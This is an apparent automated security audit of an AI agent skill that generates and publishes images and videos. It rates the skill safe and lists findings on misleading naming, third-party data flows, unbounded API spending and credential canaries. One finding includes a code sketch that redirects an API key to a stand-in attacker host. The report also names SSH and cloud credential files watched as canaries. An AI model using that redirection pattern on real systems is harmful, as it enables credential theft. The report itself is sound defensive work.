Is i54851498-gif/visual-studio-agent safe?

https://github.com/openclaw/skills/tree/main/skills/i54851498-gif/visual-studio-agent

83
SAFE

OpenFishy Feed Publisher is a transparently documented AI image/video generation and publishing skill with no prompt injection content, no sensitive file reads, and a clean installation procedure. Its primary risks are operational rather than adversarial: the misleading slug 'visual-studio-agent' could cause unintended agent activation when users mention the Microsoft IDE, every invocation transmits operator-provided API keys to three external services (fal.ai, OpenAI, and a Vercel endpoint), and the configurable VISUAL_STUDIO_API_URL creates a key-redirection attack surface if the operator environment is compromised. Canary files are intact and all data flows are fully disclosed in SKILL.md.

Category Scores

Prompt Injection 83/100 · 30%
Data Exfiltration 80/100 · 25%
Code Execution 78/100 · 20%
Clone Behavior 92/100 · 10%
Canary Integrity 95/100 · 10%
Behavioral Reasoning 70/100 · 5%

Findings (8)

MEDIUM Misleading slug 'visual-studio-agent' creates unintended activation risk -17

The GitHub repository path slug and display name both use 'visual-studio-agent', which closely resembles Microsoft Visual Studio, a widely known IDE. An LLM agent that routes skills by name similarity could activate this skill when a user says 'open my Visual Studio project', 'run a Visual Studio build', or a similar phrase, triggering fal.ai API calls, and the charges they incur, without any user intent to generate media. SKILL.md includes a disclaimer, but the slug is what agent routers parse first and embed in tool descriptions.

MEDIUM User prompts and media metadata transmitted to three external third-party services -15

Every generation cycle sends the constructed image/video prompt to fal.ai for model inference, optionally sends the same prompt plus the resulting image URL to OpenAI for quality scoring, and then sends the media URL, prompt, theme, tags, agent-profile, and idempotency key to the OpenFishy Vercel endpoint. All flows are disclosed in SKILL.md, but operators should understand that creative inputs leave the local environment on every invocation and are subject to fal.ai, OpenAI, and OpenFishy privacy policies.

MEDIUM VISUAL_STUDIO_API_URL override enables API key redirection to arbitrary endpoint -20

submit.py and publish_cycle.py read VISUAL_STUDIO_API_URL from the environment and transmit VISUAL_STUDIO_API_KEY as a Bearer token to whichever URL is configured. If this environment variable is poisoned — through a compromised operator environment, a malicious co-loaded skill that writes env vars, or prompt injection — every subsequent publish call exfiltrates the API key in the Authorization header of the redirected HTTP request. The default URL is benign, but the attack surface exists at the configuration layer.
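The vulnerable pattern can be sketched as follows. This is a minimal reconstruction of what the finding describes, not the skill's actual code; the function name, payload, and default URL are hypothetical:

```python
import os
import urllib.request

def build_publish_request(payload: bytes) -> urllib.request.Request:
    # The destination URL is taken from the environment with no allowlist
    # check, so whoever controls VISUAL_STUDIO_API_URL receives the token.
    url = os.environ.get("VISUAL_STUDIO_API_URL", "https://example.invalid/publish")
    api_key = os.environ.get("VISUAL_STUDIO_API_KEY", "")
    return urllib.request.Request(
        url,
        data=payload,
        headers={"Authorization": f"Bearer {api_key}"},
        method="POST",
    )

# If the environment is poisoned, the key rides along to the attacker's host:
os.environ["VISUAL_STUDIO_API_URL"] = "https://attacker.example/collect"
os.environ["VISUAL_STUDIO_API_KEY"] = "sk-demo"
req = build_publish_request(b"{}")
```

A mitigation at the configuration layer would be to pin the URL in code, or to reject any override whose host is not on a short allowlist.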

LOW Bundled executable Python scripts make outbound network calls on invocation -22

Five Python scripts are included in the skill and make HTTP calls to three external services when executed. While all scripts require explicit operator invocation (no auto-run on install), an agent with shell-execution capability can trigger these calls in response to user requests that match the skill's trigger description. The scripts are stdlib-only and contain no obfuscation, but their presence means the skill introduces an outbound network attack surface that does not exist for documentation-only skills.

LOW Unbounded --count flag allows unmetered fal.ai API credit consumption -10

generate_and_publish.py accepts a --count argument with no enforced upper bound. If an adversarial user message, a looping agent, or a background schedule invokes this script with a large count, the operator's fal.ai quota could be exhausted without explicit per-call confirmation. No rate limiting or budget enforcement is implemented within the skill.
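Such a bound is cheap to enforce at the argument parser. A minimal sketch, in which MAX_COUNT and the validator name are hypothetical additions rather than anything present in the skill:

```python
import argparse

MAX_COUNT = 10  # hypothetical budget cap; the skill enforces no such bound

def bounded_count(value: str) -> int:
    # argparse `type` callback that rejects out-of-range counts instead of
    # passing them straight through to the fal.ai billing meter.
    n = int(value)
    if not 1 <= n <= MAX_COUNT:
        raise argparse.ArgumentTypeError(f"--count must be 1..{MAX_COUNT}, got {n}")
    return n

parser = argparse.ArgumentParser()
parser.add_argument("--count", type=bounded_count, default=1)
args = parser.parse_args(["--count", "3"])
```

With this in place, `--count 500` fails at parse time rather than after 500 billable inference calls.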

LOW API credentials transmitted as plaintext Bearer tokens in HTTP Authorization headers -5

FAL_KEY is sent as 'Key {fal_key}' and VISUAL_STUDIO_API_KEY as 'Bearer {api_key}' in Authorization headers on every outbound request. While this is standard API authentication practice, the keys transit the network on each operation and will appear in server-side access logs at fal.ai and the OpenFishy Vercel endpoint. If TLS is compromised or logging is misconfigured at either endpoint, key exposure is possible.

INFO Clean sparse-checkout installation from public GitHub monorepo 0

Installation clones only the target skill subpath from the openclaw/skills GitHub monorepo using --depth 1 sparse checkout, then removes the temporary clone. No side-channel downloads, no package managers, no post-clone scripts. The installation procedure is fully auditable from the auditd EXECVE log.
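The install flow follows the standard shallow sparse-checkout pattern. The sketch below reproduces that pattern against a throwaway local repository so it runs offline; the repo contents and paths are stand-ins for openclaw/skills, not the audited commands verbatim:

```shell
set -e
# Stand-in for the openclaw/skills monorepo, built locally for demonstration.
src=$(mktemp -d); tmp=$(mktemp -d)
git -C "$src" init -q -b main
mkdir -p "$src/skills/demo-skill"
echo "name: demo" > "$src/skills/demo-skill/SKILL.md"
git -C "$src" add -A
git -C "$src" -c user.email=audit@example -c user.name=audit commit -qm init
# Shallow clone, then sparse checkout limited to the one skill subpath,
# mirroring the audited installation procedure.
git clone -q --depth 1 --sparse "file://$src" "$tmp"
git -C "$tmp" sparse-checkout set skills/demo-skill
result=$(ls "$tmp/skills/demo-skill/SKILL.md")
# The temporary clone is removed afterwards, as in the audited flow.
rm -rf "$src" "$tmp"
```

Because only the skill subpath is materialized and the clone is deleted, the on-disk footprint matches what the EXECVE log shows and nothing else.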

INFO Canary file accesses confirmed as Oathe audit-framework operations, not skill code 0

inotifywait and auditd PATH records show .env, .ssh/id_rsa, .aws/credentials, .npmrc, .docker/config.json, and GCloud credentials opened at two points: timestamp 1771925484 (pre-install baseline by the audit framework) and 1771925502 (post-install canary integrity verification by the audit framework). No skill Python script contains file paths referencing these locations. All accesses are CLOSE_NOWRITE (read-only), confirming no modification. Canary integrity monitor confirms all files intact.